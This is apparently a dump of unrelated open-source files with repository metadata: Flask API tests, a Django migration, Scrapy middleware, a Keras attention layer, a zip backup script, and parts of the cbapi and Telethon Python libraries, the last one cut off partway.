res = client.get(uri)
pprint(res.json)
assert res.status_code == 200
def test_patient_update():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/'+uid+'/'+pid['$oid']
res = client.put(uri, json=patient2)
pprint(res.json)
assert res.status_code == 200
def test_patient_delete():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/'+uid+'/'+pid['$oid']
res = client.delete(uri)
pprint(res.json)
assert res.status_code == 200
def test_patient_get_after_delete():
test_patient_get()
| true | true |
f72ea7d8dd96b72bf999b8d29730d781aa003ace | 321 | py | Python | main/migrations/0002_remove_project_created_date.py | NancyWachiuri/AwardsApp | c4eb0a87ab528c2166d1bd27e3ec6302e7ef08df | [
"MIT"
] | null | null | null | main/migrations/0002_remove_project_created_date.py | NancyWachiuri/AwardsApp | c4eb0a87ab528c2166d1bd27e3ec6302e7ef08df | [
"MIT"
] | null | null | null | main/migrations/0002_remove_project_created_date.py | NancyWachiuri/AwardsApp | c4eb0a87ab528c2166d1bd27e3ec6302e7ef08df | [
"MIT"
] | null | null | null | # Generated by Django 3.2.8 on 2021-11-05 00:54
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='project',
name='created_date',
),
]
| 17.833333 | 47 | 0.582555 |
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='project',
name='created_date',
),
]
| true | true |
f72ea823aa4b99280f01169d6a40994760c8465e | 3,674 | py | Python | 18.Web Scraping with Python Scrapy - RM/03_Advanced_Techniques/news_scraper_challenge/news_scraper_challenge/middlewares.py | ptyadana/python-dojo | 98c7234b84f0afea99a091c7198342d66bbdff5b | [
"MIT"
] | 3 | 2020-06-01T04:17:18.000Z | 2020-12-18T03:05:55.000Z | 18.Web Scraping with Python Scrapy - RM/03_Advanced_Techniques/news_scraper_challenge/news_scraper_challenge/middlewares.py | ptyadana/python-dojo | 98c7234b84f0afea99a091c7198342d66bbdff5b | [
"MIT"
] | 1 | 2020-04-25T08:01:59.000Z | 2020-04-25T08:01:59.000Z | 18.Web Scraping with Python Scrapy - RM/03_Advanced_Techniques/news_scraper_challenge/news_scraper_challenge/middlewares.py | ptyadana/python-dojo | 98c7234b84f0afea99a091c7198342d66bbdff5b | [
"MIT"
] | 7 | 2020-04-26T10:02:36.000Z | 2021-06-08T05:12:46.000Z | # Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class NewsScraperChallengeSpiderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, or item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Request or item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class NewsScraperChallengeDownloaderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| 35.326923 | 78 | 0.676647 |
from scrapy import signals
from itemadapter import is_item, ItemAdapter
class NewsScraperChallengeSpiderMiddleware:
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
return None
def process_spider_output(self, response, result, spider):
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
pass
def process_start_requests(self, start_requests, spider):
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class NewsScraperChallengeDownloaderMiddleware:
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
return None
def process_response(self, request, response, spider):
return response
def process_exception(self, request, exception, spider):
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| true | true |
f72ea85064b2c2a6f54570529a6ce35ac41d67bd | 488 | py | Python | astronomy_datamodels/tests/test_subarray.py | spacetelescope/astronomy_datamodels | ca5db82d5982781ea763cef9851d4c982fd86328 | [
"BSD-3-Clause"
] | 1 | 2019-03-08T03:06:43.000Z | 2019-03-08T03:06:43.000Z | astronomy_datamodels/tests/test_subarray.py | spacetelescope/astronomy_datamodels | ca5db82d5982781ea763cef9851d4c982fd86328 | [
"BSD-3-Clause"
] | 1 | 2020-10-29T19:54:28.000Z | 2020-10-29T19:54:28.000Z | astronomy_datamodels/tests/test_subarray.py | spacetelescope/astronomy_datamodels | ca5db82d5982781ea763cef9851d4c982fd86328 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
import pytest
import numpy as np
asdf = pytest.importorskip('asdf', minversion='2.0.0.dev0')
from asdf import util
from asdf.tests import helpers
from ..subarray import Subarray
def test1(tmpdir, ret=False):
subarray = Subarray(offset=(100, 131), size=(256, 256), name='SA1')
tree = {'subarray': subarray}
if ret:
return subarray
helpers.assert_roundtrip_tree(tree, tmpdir) | 28.705882 | 71 | 0.702869 |
import pytest
import numpy as np
asdf = pytest.importorskip('asdf', minversion='2.0.0.dev0')
from asdf import util
from asdf.tests import helpers
from ..subarray import Subarray
def test1(tmpdir, ret=False):
subarray = Subarray(offset=(100, 131), size=(256, 256), name='SA1')
tree = {'subarray': subarray}
if ret:
return subarray
helpers.assert_roundtrip_tree(tree, tmpdir) | true | true |
f72ea9c1cb6d29549be75d7beed55fe01e257814 | 707 | py | Python | tests/framework/RunFailures/failer.py | rinelson456/raven | 1114246136a2f72969e75b5e99a11b35500d4eef | [
"Apache-2.0"
] | 159 | 2017-03-24T21:07:06.000Z | 2022-03-20T13:44:40.000Z | tests/framework/RunFailures/failer.py | rinelson456/raven | 1114246136a2f72969e75b5e99a11b35500d4eef | [
"Apache-2.0"
] | 1,667 | 2017-03-27T14:41:22.000Z | 2022-03-31T19:50:06.000Z | tests/framework/RunFailures/failer.py | rinelson456/raven | 1114246136a2f72969e75b5e99a11b35500d4eef | [
"Apache-2.0"
] | 95 | 2017-03-24T21:05:03.000Z | 2022-03-08T17:30:22.000Z | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def run(self,Input):
if self.x+self.y > 0:
raise IOError('Testing, testing, 1,2,3.')
self.ans = self.x+self.y
| 39.277778 | 74 | 0.746818 |
def run(self,Input):
if self.x+self.y > 0:
raise IOError('Testing, testing, 1,2,3.')
self.ans = self.x+self.y
| true | true |
f72eaa3113edd3d25a929e626271bcff8fa160e6 | 1,162 | py | Python | ver-3/backup_ver3.py | Emmanuel-Temitope/backup-problem-solved | c5e10bc586c9fc449c6e13d08f9ad0d964105c67 | [
"MIT"
] | null | null | null | ver-3/backup_ver3.py | Emmanuel-Temitope/backup-problem-solved | c5e10bc586c9fc449c6e13d08f9ad0d964105c67 | [
"MIT"
] | null | null | null | ver-3/backup_ver3.py | Emmanuel-Temitope/backup-problem-solved | c5e10bc586c9fc449c6e13d08f9ad0d964105c67 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Jun 9 18:52:56 2019
@author: Emmanuel-Temitope
"""
import os
import time
#location of directory
source = [r'source', '"Another source"']
#targer directory
target_dir = r'target'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
today = target_dir + os.sep + time.strftime('%Y%m%d')
#current time will be the zip archive
now = time.strftime('%H%M%S')
#User Comment
comment = input('Enter a comment --> ')
#check if comment was entered
if len(comment) == 0:
target = today + os.sep + now + '.zip'
else:
target = today + os.sep + now + '_' + \
comment.replace(" ", "_")
print(time.asctime())
#create the subdirectory if it isn't there
if not os.path.exists(today):
os.mkdir(today)
print('Successfully created directory', today)
#we use the zip command to put the files in a zip archive
zip_command = 'zip -r {0} {1}'.format(target, ' '.join(source))
#Run the backup
print('Zip command is: ')
print(zip_command)
print('Running...')
if os.system(zip_command) == 0:
print('Successful backup to', target,'at ', time.asctime())
else:
print('Backup FAILED')
| 22.784314 | 63 | 0.654905 |
import os
import time
source = [r'source', '"Another source"']
target_dir = r'target'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
today = target_dir + os.sep + time.strftime('%Y%m%d')
now = time.strftime('%H%M%S')
comment = input('Enter a comment --> ')
if len(comment) == 0:
target = today + os.sep + now + '.zip'
else:
target = today + os.sep + now + '_' + \
comment.replace(" ", "_")
print(time.asctime())
if not os.path.exists(today):
os.mkdir(today)
print('Successfully created directory', today)
#we use the zip command to put the files in a zip archive
zip_command = 'zip -r {0} {1}'.format(target, ' '.join(source))
#Run the backup
print('Zip command is: ')
print(zip_command)
print('Running...')
if os.system(zip_command) == 0:
print('Successful backup to', target,'at ', time.asctime())
else:
print('Backup FAILED')
| true | true |
f72eaa8f5af2633482ecb8f03a085435a35f5fa3 | 4,852 | py | Python | archive/attention.py | emmettmeinzer/hmwgen | cd47733b5a34a6a3a9b56026eb5e73069e398033 | [
"MIT"
] | null | null | null | archive/attention.py | emmettmeinzer/hmwgen | cd47733b5a34a6a3a9b56026eb5e73069e398033 | [
"MIT"
] | null | null | null | archive/attention.py | emmettmeinzer/hmwgen | cd47733b5a34a6a3a9b56026eb5e73069e398033 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 5 22:53:44 2020
@author: Emmett
"""
import tensorflow as tf
import os
from tensorflow.python.keras.layers import Layer
from tensorflow.python.keras import backend as K
class AttentionLayer(Layer):
"""
This class implements Bahdanau attention (https://arxiv.org/pdf/1409.0473.pdf).
There are three sets of weights introduced W_a, U_a, and V_a
"""
def __init__(self, **kwargs):
super(AttentionLayer, self).__init__(**kwargs)
def build(self, input_shape):
assert isinstance(input_shape, list)
# Create a trainable weight variable for this layer.
self.W_a = self.add_weight(name='W_a',
shape=tf.TensorShape((input_shape[0][2], input_shape[0][2])),
initializer='uniform',
trainable=True)
self.U_a = self.add_weight(name='U_a',
shape=tf.TensorShape((input_shape[1][2], input_shape[0][2])),
initializer='uniform',
trainable=True)
self.V_a = self.add_weight(name='V_a',
shape=tf.TensorShape((input_shape[0][2], 1)),
initializer='uniform',
trainable=True)
super(AttentionLayer, self).build(input_shape) # Be sure to call this at the end
def call(self, inputs, verbose=False):
"""
inputs: [encoder_output_sequence, decoder_output_sequence]
"""
assert type(inputs) == list
encoder_out_seq, decoder_out_seq = inputs
if verbose:
print('encoder_out_seq>', encoder_out_seq.shape)
print('decoder_out_seq>', decoder_out_seq.shape)
def energy_step(inputs, states):
""" Step function for computing energy for a single decoder state
inputs: (batchsize * 1 * de_in_dim)
states: (batchsize * 1 * de_latent_dim)
"""
assert_msg = "States must be an iterable. Got {} of type {}".format(states, type(states))
assert isinstance(states, list) or isinstance(states, tuple), assert_msg
""" Some parameters required for shaping tensors"""
en_seq_len, en_hidden = encoder_out_seq.shape[1], encoder_out_seq.shape[2]
de_hidden = inputs.shape[-1]
""" Computing S.Wa where S=[s0, s1, ..., si]"""
# <= batch size * en_seq_len * latent_dim
W_a_dot_s = K.dot(encoder_out_seq, self.W_a)
""" Computing hj.Ua """
U_a_dot_h = K.expand_dims(K.dot(inputs, self.U_a), 1) # <= batch_size, 1, latent_dim
if verbose:
print('Ua.h>', U_a_dot_h.shape)
""" tanh(S.Wa + hj.Ua) """
# <= batch_size*en_seq_len, latent_dim
Ws_plus_Uh = K.tanh(W_a_dot_s + U_a_dot_h)
if verbose:
print('Ws+Uh>', Ws_plus_Uh.shape)
""" softmax(va.tanh(S.Wa + hj.Ua)) """
# <= batch_size, en_seq_len
e_i = K.squeeze(K.dot(Ws_plus_Uh, self.V_a), axis=-1)
# <= batch_size, en_seq_len
e_i = K.softmax(e_i)
if verbose:
print('ei>', e_i.shape)
return e_i, [e_i]
def context_step(inputs, states):
""" Step function for computing ci using ei """
assert_msg = "States must be an iterable. Got {} of type {}".format(states, type(states))
assert isinstance(states, list) or isinstance(states, tuple), assert_msg
# <= batch_size, hidden_size
c_i = K.sum(encoder_out_seq * K.expand_dims(inputs, -1), axis=1)
if verbose:
print('ci>', c_i.shape)
return c_i, [c_i]
fake_state_c = K.sum(encoder_out_seq, axis=1)
fake_state_e = K.sum(encoder_out_seq, axis=2) # <= (batch_size, enc_seq_len, latent_dim
""" Computing energy outputs """
# e_outputs => (batch_size, de_seq_len, en_seq_len)
last_out, e_outputs, _ = K.rnn(
energy_step, decoder_out_seq, [fake_state_e],
)
""" Computing context vectors """
last_out, c_outputs, _ = K.rnn(
context_step, e_outputs, [fake_state_c],
)
return c_outputs, e_outputs
def compute_output_shape(self, input_shape):
""" Outputs produced by the layer """
return [
tf.TensorShape((input_shape[1][0], input_shape[1][1], input_shape[1][2])),
tf.TensorShape((input_shape[1][0], input_shape[1][1], input_shape[0][1]))
] | 39.447154 | 102 | 0.543899 |
import tensorflow as tf
import os
from tensorflow.python.keras.layers import Layer
from tensorflow.python.keras import backend as K
class AttentionLayer(Layer):
def __init__(self, **kwargs):
super(AttentionLayer, self).__init__(**kwargs)
def build(self, input_shape):
assert isinstance(input_shape, list)
self.W_a = self.add_weight(name='W_a',
shape=tf.TensorShape((input_shape[0][2], input_shape[0][2])),
initializer='uniform',
trainable=True)
self.U_a = self.add_weight(name='U_a',
shape=tf.TensorShape((input_shape[1][2], input_shape[0][2])),
initializer='uniform',
trainable=True)
self.V_a = self.add_weight(name='V_a',
shape=tf.TensorShape((input_shape[0][2], 1)),
initializer='uniform',
trainable=True)
super(AttentionLayer, self).build(input_shape)
def call(self, inputs, verbose=False):
assert type(inputs) == list
encoder_out_seq, decoder_out_seq = inputs
if verbose:
print('encoder_out_seq>', encoder_out_seq.shape)
print('decoder_out_seq>', decoder_out_seq.shape)
def energy_step(inputs, states):
assert_msg = "States must be an iterable. Got {} of type {}".format(states, type(states))
assert isinstance(states, list) or isinstance(states, tuple), assert_msg
en_seq_len, en_hidden = encoder_out_seq.shape[1], encoder_out_seq.shape[2]
de_hidden = inputs.shape[-1]
W_a_dot_s = K.dot(encoder_out_seq, self.W_a)
U_a_dot_h = K.expand_dims(K.dot(inputs, self.U_a), 1)
if verbose:
print('Ua.h>', U_a_dot_h.shape)
Ws_plus_Uh = K.tanh(W_a_dot_s + U_a_dot_h)
if verbose:
print('Ws+Uh>', Ws_plus_Uh.shape)
e_i = K.squeeze(K.dot(Ws_plus_Uh, self.V_a), axis=-1)
e_i = K.softmax(e_i)
if verbose:
print('ei>', e_i.shape)
return e_i, [e_i]
def context_step(inputs, states):
assert_msg = "States must be an iterable. Got {} of type {}".format(states, type(states))
assert isinstance(states, list) or isinstance(states, tuple), assert_msg
c_i = K.sum(encoder_out_seq * K.expand_dims(inputs, -1), axis=1)
if verbose:
print('ci>', c_i.shape)
return c_i, [c_i]
fake_state_c = K.sum(encoder_out_seq, axis=1)
fake_state_e = K.sum(encoder_out_seq, axis=2)
last_out, e_outputs, _ = K.rnn(
energy_step, decoder_out_seq, [fake_state_e],
)
last_out, c_outputs, _ = K.rnn(
context_step, e_outputs, [fake_state_c],
)
return c_outputs, e_outputs
def compute_output_shape(self, input_shape):
return [
tf.TensorShape((input_shape[1][0], input_shape[1][1], input_shape[1][2])),
tf.TensorShape((input_shape[1][0], input_shape[1][1], input_shape[0][1]))
] | true | true |
f72eabe57eec9d5c6a19eec2a538f36cdca7eb4c | 637 | py | Python | src/cbapi/__init__.py | rlmaers/cbapi-python | 395763e609ba1338ff3c7540395a6f2804e94584 | [
"MIT"
] | 3 | 2019-01-23T19:11:33.000Z | 2022-02-25T02:06:51.000Z | src/cbapi/__init__.py | rlmaers/cbapi-python | 395763e609ba1338ff3c7540395a6f2804e94584 | [
"MIT"
] | null | null | null | src/cbapi/__init__.py | rlmaers/cbapi-python | 395763e609ba1338ff3c7540395a6f2804e94584 | [
"MIT"
] | 1 | 2022-02-25T02:06:52.000Z | 2022-02-25T02:06:52.000Z | from __future__ import absolute_import
import cbapi.six
__title__ = 'cbapi'
__author__ = 'Carbon Black Developer Network'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 Carbon Black'
__version__ = '1.3.6'
# New API as of cbapi 0.9.0
from cbapi.response.rest_api import CbEnterpriseResponseAPI, CbResponseAPI
from cbapi.protection.rest_api import CbEnterpriseProtectionAPI, CbProtectionAPI
from cbapi.psc.defense import CbDefenseAPI
from cbapi.psc.threathunter import CbThreatHunterAPI
from cbapi.psc.livequery import CbLiveQueryAPI
# for compatibility with Cb Defense code from cbapi < 1.4.0
import cbapi.psc.defense as defense
| 31.85 | 80 | 0.821036 | from __future__ import absolute_import
import cbapi.six
__title__ = 'cbapi'
__author__ = 'Carbon Black Developer Network'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 Carbon Black'
__version__ = '1.3.6'
from cbapi.response.rest_api import CbEnterpriseResponseAPI, CbResponseAPI
from cbapi.protection.rest_api import CbEnterpriseProtectionAPI, CbProtectionAPI
from cbapi.psc.defense import CbDefenseAPI
from cbapi.psc.threathunter import CbThreatHunterAPI
from cbapi.psc.livequery import CbLiveQueryAPI
import cbapi.psc.defense as defense
| true | true |
f72eac1b900c7f609802611bd21042c02362d0e3 | 16,499 | py | Python | telethon/client/users.py | polisitni1/DogeClickBot | ac57eaeefca2c6ab9e48458f9f928a6a421a162e | [
"MIT"
] | null | null | null | telethon/client/users.py | polisitni1/DogeClickBot | ac57eaeefca2c6ab9e48458f9f928a6a421a162e | [
"MIT"
] | null | null | null | telethon/client/users.py | polisitni1/DogeClickBot | ac57eaeefca2c6ab9e48458f9f928a6a421a162e | [
"MIT"
] | null | null | null | import asyncio
import itertools
import logging
import time
from .telegrambaseclient import TelegramBaseClient
from .. import errors, utils
from ..tl import TLObject, TLRequest, types, functions
__log__ = logging.getLogger(__name__)
_NOT_A_REQUEST = TypeError('You can only invoke requests, not types!')
class UserMethods(TelegramBaseClient):
async def __call__(self, request, ordered=False):
for r in (request if utils.is_list_like(request) else (request,)):
if not isinstance(r, TLRequest):
raise _NOT_A_REQUEST
await r.resolve(self, utils)
# Avoid making the request if it's already in a flood wait
if r.CONSTRUCTOR_ID in self._flood_waited_requests:
due = self._flood_waited_requests[r.CONSTRUCTOR_ID]
diff = round(due - time.time())
if diff <= 3: # Flood waits below 3 seconds are "ignored"
self._flood_waited_requests.pop(r.CONSTRUCTOR_ID, None)
elif diff <= self.flood_sleep_threshold:
__log__.info('Sleeping early for %ds on flood wait', diff)
await asyncio.sleep(diff, loop=self._loop)
self._flood_waited_requests.pop(r.CONSTRUCTOR_ID, None)
else:
raise errors.FloodWaitError(capture=diff)
request_index = 0
self._last_request = time.time()
for _ in range(self._request_retries):
try:
future = self._sender.send(request, ordered=ordered)
if isinstance(future, list):
results = []
for f in future:
result = await f
self.session.process_entities(result)
results.append(result)
request_index += 1
return results
else:
result = await future
self.session.process_entities(result)
return result
except (errors.ServerError, errors.RpcCallFailError) as e:
__log__.warning('Telegram is having internal issues %s: %s',
e.__class__.__name__, e)
except (errors.FloodWaitError, errors.FloodTestPhoneWaitError) as e:
if utils.is_list_like(request):
request = request[request_index]
self._flood_waited_requests\
[request.CONSTRUCTOR_ID] = time.time() + e.seconds
if e.seconds <= self.flood_sleep_threshold:
__log__.info('Sleeping for %ds on flood wait', e.seconds)
await asyncio.sleep(e.seconds, loop=self._loop)
else:
raise
except (errors.PhoneMigrateError, errors.NetworkMigrateError,
errors.UserMigrateError) as e:
__log__.info('Phone migrated to %d', e.new_dc)
should_raise = isinstance(e, (
errors.PhoneMigrateError, errors.NetworkMigrateError
))
if should_raise and await self.is_user_authorized():
raise
await self._switch_dc(e.new_dc)
raise ValueError('Number of retries reached 0')
# region Public methods
async def get_me(self, input_peer=False):
"""
Gets "me" (the self user) which is currently authenticated,
or None if the request fails (hence, not authenticated).
Args:
input_peer (`bool`, optional):
Whether to return the :tl:`InputPeerUser` version or the normal
:tl:`User`. This can be useful if you just need to know the ID
of yourself.
Returns:
Your own :tl:`User`.
"""
if input_peer and self._self_input_peer:
return self._self_input_peer
try:
me = (await self(
functions.users.GetUsersRequest([types.InputUserSelf()])))[0]
if not self._self_input_peer:
self._self_input_peer = utils.get_input_peer(
me, allow_self=False
)
return self._self_input_peer if input_peer else me
except errors.UnauthorizedError:
return None
async def is_user_authorized(self):
"""
Returns ``True`` if the user is authorized.
"""
if self._self_input_peer is not None or self._state.pts != -1:
return True
try:
self._state = await self(functions.updates.GetStateRequest())
return True
except errors.RPCError:
return False
async def get_entity(self, entity):
"""
Turns the given entity into a valid Telegram :tl:`User`, :tl:`Chat`
or :tl:`Channel`. You can also pass a list or iterable of entities,
and they will be efficiently fetched from the network.
entity (`str` | `int` | :tl:`Peer` | :tl:`InputPeer`):
If an username is given, **the username will be resolved** making
an API call every time. Resolving usernames is an expensive
operation and will start hitting flood waits around 50 usernames
in a short period of time.
If you want to get the entity for a *cached* username, you should
first `get_input_entity(username) <get_input_entity>` which will
use the cache), and then use `get_entity` with the result of the
previous call.
Similar limits apply to invite links, and you should use their
ID instead.
Using phone numbers, exact names, integer IDs or :tl:`Peer`
rely on a `get_input_entity` first, which in turn needs the
entity to be in cache, unless a :tl:`InputPeer` was passed.
Unsupported types will raise ``TypeError``.
If the entity can't be found, ``ValueError`` will be raised.
Returns:
:tl:`User`, :tl:`Chat` or :tl:`Channel` corresponding to the
input entity. A list will be returned if more than one was given.
"""
single = not utils.is_list_like(entity)
if single:
entity = (entity,)
# Group input entities by string (resolve username),
# input users (get users), input chat (get chats) and
# input channels (get channels) to get the most entities
# in the less amount of calls possible.
inputs = []
for x in entity:
if isinstance(x, str):
inputs.append(x)
else:
inputs.append(await self.get_input_entity(x))
users = [x for x in inputs
if isinstance(x, (types.InputPeerUser, types.InputPeerSelf))]
chats = [x.chat_id for x in inputs
if isinstance(x, types.InputPeerChat)]
channels = [x for x in inputs
if isinstance(x, types.InputPeerChannel)]
if users:
# GetUsersRequest has a limit of 200 per call
tmp = []
while users:
curr, users = users[:200], users[200:]
tmp.extend(await self(functions.users.GetUsersRequest(curr)))
users = tmp
if chats: # TODO Handle chats slice?
chats = (await self(
functions.messages.GetChatsRequest(chats))).chats
if channels:
channels = (await self(
functions.channels.GetChannelsRequest(channels))).chats
# Merge users, chats and channels into a single dictionary
id_entity = {
utils.get_peer_id(x): x
for x in itertools.chain(users, chats, channels)
}
# We could check saved usernames and put them into the users,
# chats and channels list from before. While this would reduce
# the amount of ResolveUsername calls, it would fail to catch
# username changes.
result = []
for x in inputs:
if isinstance(x, str):
result.append(await self._get_entity_from_string(x))
elif not isinstance(x, types.InputPeerSelf):
result.append(id_entity[utils.get_peer_id(x)])
else:
result.append(next(
u for u in id_entity.values()
if isinstance(u, types.User) and u.is_self
))
return result[0] if single else result
async def get_input_entity(self, peer):
"""
Turns the given peer into its input entity version. Most requests
use this kind of :tl:`InputPeer`, so this is the most suitable call
to make for those cases. **Generally you should let the library do
its job** and don't worry about getting the input entity first, but
if you're going to use an entity often, consider making the call:
>>> import asyncio
>>> rc = asyncio.get_event_loop().run_until_complete
>>>
>>> from telethon import TelegramClient
>>> client = TelegramClient(...)
>>> # If you're going to use "username" often in your code
>>> # (make a lot of calls), consider getting its input entity
>>> # once, and then using the "user" everywhere instead.
>>> user = rc(client.get_input_entity('username'))
>>> # The same applies to IDs, chats or channels.
>>> chat = rc(client.get_input_entity(-123456789))
entity (`str` | `int` | :tl:`Peer` | :tl:`InputPeer`):
If an username is given, **the library will use the cache**. This
means that it's possible to be using an username that *changed*.
If the username is not found in the cache, it will be fetched.
The same rules apply to phone numbers (``'+34 123456789'``).
If an exact name is given, it must be in the cache too. This
is not reliable as different people can share the same name
and which entity is returned is arbitrary, and should be used
only for quick tests.
If a positive integer ID is given, the entity will be searched
in cached users, chats or channels, without making any call.
If a negative integer ID is given, the entity will be searched
exactly as either a chat (prefixed with ``-``) or as a channel
(prefixed with ``-100``).
If a :tl:`Peer` is given, it will be searched exactly in the
cache as either an user, chat or channel.
If the given object can be turned into an input entity directly,
said operation will be done.
Invite links make an API call **always** and are expensive.
You should use the chat ID instead.
Unsupported types will raise ``TypeError``.
If the entity can't be found, ``ValueError`` will be raised.
Returns:
:tl:`InputPeerUser`, :tl:`InputPeerChat` or :tl:`InputPeerChannel`
or :tl:`InputPeerSelf` if the parameter is ``'me'`` or ``'self'``.
If you need to get the ID of yourself, you should use
`get_me` with ``input_peer=True``) instead.
"""
if peer in ('me', 'self'):
return types.InputPeerSelf()
try:
# First try to get the entity from cache, otherwise figure it out
return self.session.get_input_entity(peer)
except ValueError:
pass
if isinstance(peer, str):
return utils.get_input_peer(
await self._get_entity_from_string(peer))
if not isinstance(peer, int) and (not isinstance(peer, TLObject)
or peer.SUBCLASS_OF_ID != 0x2d45687):
# Try casting the object into an input peer. Might TypeError.
# Don't do it if a not-found ID was given (instead ValueError).
# Also ignore Peer (0x2d45687 == crc32(b'Peer'))'s, lacking hash.
return utils.get_input_peer(peer)
raise ValueError(
'Could not find the input entity for "{}". Please read https://'
'telethon.readthedocs.io/en/latest/extra/basic/entities.html to'
' find out more details.'
.format(peer)
)
async def get_peer_id(self, peer, add_mark=True):
"""
Gets the ID for the given peer, which may be anything entity-like.
This method needs to be ``async`` because `peer` supports usernames,
invite-links, phone numbers, etc.
If ``add_mark is False``, then a positive ID will be returned
instead. By default, bot-API style IDs (signed) are returned.
"""
if isinstance(peer, int):
return utils.get_peer_id(peer, add_mark=add_mark)
try:
if peer.SUBCLASS_OF_ID in (0x2d45687, 0xc91c90b6):
# 0x2d45687, 0xc91c90b6 == crc32(b'Peer') and b'InputPeer'
return utils.get_peer_id(peer)
except AttributeError:
pass
peer = await self.get_input_entity(peer)
if isinstance(peer, types.InputPeerSelf):
peer = await self.get_me(input_peer=True)
return utils.get_peer_id(peer, add_mark=add_mark)
# endregion
# region Private methods
async def _get_entity_from_string(self, string):
"""
Gets a full entity from the given string, which may be a phone or
an username, and processes all the found entities on the session.
The string may also be a user link, or a channel/chat invite link.
This method has the side effect of adding the found users to the
session database, so it can be queried later without API calls,
if this option is enabled on the session.
Returns the found entity, or raises TypeError if not found.
"""
phone = utils.parse_phone(string)
if phone:
for user in (await self(
functions.contacts.GetContactsRequest(0))).users:
if user.phone == phone:
return user
else:
username, is_join_chat = utils.parse_username(string)
if is_join_chat:
invite = await self(
functions.messages.CheckChatInviteRequest(username))
if isinstance(invite, types.ChatInvite):
raise ValueError(
'Cannot get entity from a channel (or group) '
'that you are not part of. Join the group and retry'
)
elif isinstance(invite, types.ChatInviteAlready):
return invite.chat
elif username:
if username in ('me', 'self'):
return await self.get_me()
try:
result = await self(
functions.contacts.ResolveUsernameRequest(username))
except errors.UsernameNotOccupiedError as e:
raise ValueError('No user has "{}" as username'
.format(username)) from e
for entity in itertools.chain(result.users, result.chats):
if getattr(entity, 'username', None) or '' \
.lower() == username:
return entity
try:
# Nobody with this username, maybe it's an exact name/title
return await self.get_entity(
self.session.get_input_entity(string))
except ValueError:
pass
raise ValueError(
'Cannot find any entity corresponding to "{}"'.format(string)
)
async def _get_input_notify(self, notify):
"""
Returns a :tl:`InputNotifyPeer`. This is a bit tricky because
it may or not need access to the client to convert what's given
into an input entity.
"""
try:
if notify.SUBCLASS_OF_ID == 0x58981615:
if isinstance(notify, types.InputNotifyPeer):
notify.peer = await self.get_input_entity(notify.peer)
return notify
except AttributeError:
return types.InputNotifyPeer(await self.get_input_entity(notify))
# endregion
| 41.042289 | 80 | 0.576217 | import asyncio
import itertools
import logging
import time
from .telegrambaseclient import TelegramBaseClient
from .. import errors, utils
from ..tl import TLObject, TLRequest, types, functions
__log__ = logging.getLogger(__name__)
_NOT_A_REQUEST = TypeError('You can only invoke requests, not types!')
class UserMethods(TelegramBaseClient):
async def __call__(self, request, ordered=False):
for r in (request if utils.is_list_like(request) else (request,)):
if not isinstance(r, TLRequest):
raise _NOT_A_REQUEST
